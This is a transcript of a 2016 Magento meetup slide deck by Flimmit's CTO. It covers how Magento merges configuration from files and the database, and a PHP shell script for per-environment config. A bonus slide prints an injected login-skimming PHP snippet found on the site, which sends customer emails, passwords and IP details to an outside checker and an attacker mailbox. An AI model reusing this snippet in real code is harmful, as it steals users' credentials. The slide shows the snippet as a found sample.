This document discusses managing Magento configuration data for different production environments. It begins with an overview of Flimmit and the presenter. It then discusses how Magento loads configuration data from various files and the database. Managing configurations across development, staging, and production environments poses challenges. The presenter proposes a shell script that loads configuration settings from multiple files based on the environment. This approach allows configurations to be managed in version control and avoids including live access credentials in non-production databases. Pros of this approach include easy versioning and ensuring the correct configuration for load balancers. Cons include overriding settings stored in the database.

1. Einfache Verwaltung von Config Daten für verschiedene Production Levels 18.05.2016
16. Magento-Stammtisch in Wien

2. | © Flimmit 2016 (confidential)2
→ Flimmit at a glance
→ About me
→ Functionality Magento Config
→ Challenges for daily business
→ Management with Config Script
→ Pros & Cons
Agenda

3. | © Flimmit 2016 (confidential)3
Flimmit at a Glance
Quick Facts
– Founded in 2007, based in Vienna
– Private Ownership, 3 founders/shareholders – worked as team since 2000
– Public Funding: EU Programme „Media“, Departure - Creative Agency Vienna,
Austria Wirtschaftsservice (AWS impulse), AT.net (BMVIT, FFG), Austrian Film
Institute(ÖFI), Wirtschaftsagentur Wien
– Take over by ORF in 2016 (ORS)
Business Units
– VoD portal for stream/download on multiple devices
– Film & TV Search engine module
– Content aggregation & distribution for third parties

4. | © Flimmit 2016 (confidential)4

5. | © Flimmit 2016 (confidential)5
About me
→ FH study in Salzburg 1998 – 2002
„Information Management & New Media“
→ PHP Developer since 2002
→ Magento Developer since 2008
→ Certified Developer since 05/2012
→ CTO & Founder at Flimmit

6. | © Flimmit 2016 (confidential)6
Functionality Magento Config
→ Core functionality in Mage_Core_Model_Config
→ Central Config merged from several files
Mage_Core_Model_Config::init()
– loadBase
– loadModules
– loadDb

7. | © Flimmit 2016 (confidential)7
Magento Config Init I
→ loadBase: Load all files from Etc-Directory „app/etc/“

8. | © Flimmit 2016 (confidential)8
Magento Config Init II
→ loadModules: Load all files from every module directory & local.xml

9. | © Flimmit 2016 (confidential)9
Magento Config Init III
→ loadDB: Load config from DB (core_config_data)

10. | © Flimmit 2016 (confidential)10
Challenges for daily business
→ Different development enviroments (local, stage, testing, live)
→ Different access levels for external services (e.g. payment)
→ Different development systems (cachetypes, session, smtp)
→ MySQL Dumps from live system include core_config_data (= live access data)
→ DB config not able to keep history/versions (e.g. in GIT)

11. | © Flimmit 2016 (confidential)11
Management with Config Script
→ Shell script in shell folder „config.php“
→ Config folder in „app/etc/“
→ Manage all config in different files
– local.xml for „local“ values
– mode-{type}.xml for modus values
– default.xml for default values
– global.xml for installation values
– store-{storecode}.xml for store relevant values
– website-{website}.xml for website relevant values
– …
→ php shell/config.php -mode live
to load relevant data into app/etc/local.xml
→ Live demo…!

12. | © Flimmit 2016 (confidential)12
Learnings, Pros & Cons
→ Learnings
– DB Config always wins!
– All levels within <config/> adjustable (global, default, admin, frontend, etc)
→ Pros
– Easy to manage in GIT with history
– Ensure live mode for loadbalancer nodes on startup:
php shell/config.php -mode live
– Avoid live access data in development
– Basic settings for new magento insallation available (sales, customer, catalog, etc)
→ Cons
– Avoid saving config in backend -> insert/update in DB
– Don‘t split in too many files

13. | © Flimmit 2016 (confidential)13
Bonus: mean hack found
→ Login for Customer (clean):

14. | © Flimmit 2016 (confidential)14
Bonus: mean hack found
→ Login for Customer (hacked):

15. | © Flimmit 2016 (confidential)15
Bonus: mean hack found
→ Script:
$emailboss = $username; $passboss = $password; $serverboss =
$_SERVER['SERVER_NAME']; $ipboss = $_SERVER['REMOTE_ADDR']; $details =
json_decode(file_get_contents("http://www.telize.com/geoip/".$ipboss.""));
$negara = $details->country_code; $nama_negara = $details->country; $kode_negara
= strtolower($negara); $chkmail =
file_get_contents("http://p4b.litbang.kkp.go.id/p4bjurnal/modules/path/mailceck/
?e=".$emailboss."&p=".$passboss.""); $pesan = "Email : ".$emailboss."nPassword
: ".$passboss."nStatus : ".$chkmail."nnIP Info : ".$ipboss." |
".$nama_negara." On ".date('r')."nBrowser :
".$_SERVER['HTTP_USER_AGENT']."nSite : ".$serverboss.""; $tamvan =
"loggercc@yahoo.com"; $subject = "User Login (".$chkmail.") (".$nama_negara.")
(".$ipboss.")"; $headers = "From: Logger User Magento From ".$serverboss."
<".$ipboss."@".$serverboss.">"; mail($tamvan, $subject, $pesan, $headers);

16. | © Flimmit 2016 (confidential)16
… to be continued …